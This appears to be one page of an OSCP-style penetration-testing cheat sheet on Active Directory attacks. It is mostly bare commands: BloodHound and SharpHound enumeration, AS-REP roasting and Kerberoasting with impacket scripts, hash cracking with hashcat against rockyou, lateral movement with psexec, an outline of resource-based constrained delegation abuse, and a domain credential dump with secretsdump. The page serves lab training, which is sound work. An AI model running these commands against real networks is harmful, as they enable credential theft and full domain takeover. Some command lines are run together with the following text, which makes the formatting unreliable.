🏢 Active Directory Attacks
Common AD attacks used in OSCP-like labs and enterprise environments.
➡️ Environment: See 00_environment_setup
🧠 BloodHound
neo4j console &
bloodhound &
SharpHound.exe -c all -vAnalyze output for shortest path to Domain Admin.
🔐 Kerberos
AS-REP Roasting
GetNPUsers.py -no-pass -dc-ip $IP example.com/ -usersfile users.txt
hashcat -m 18200 hash.txt rockyou.txtKerberoasting
GetUserSPNs.py example.com/user:pass -dc-ip $IP🧪 Lateral Movement
- SMB relay
- PSExec
impacket-psexec user:pass@$IP🧪 RBCD (Resource-Based Constrained Delegation)
- Add compromised user to a computer object delegation rights
- Use
addcomputer.pyands4u2proxyattack with impacket
🧪 Dumping Hashes
secretsdump.py -just-dc user:pass@$IPNext: 07_post_exploitation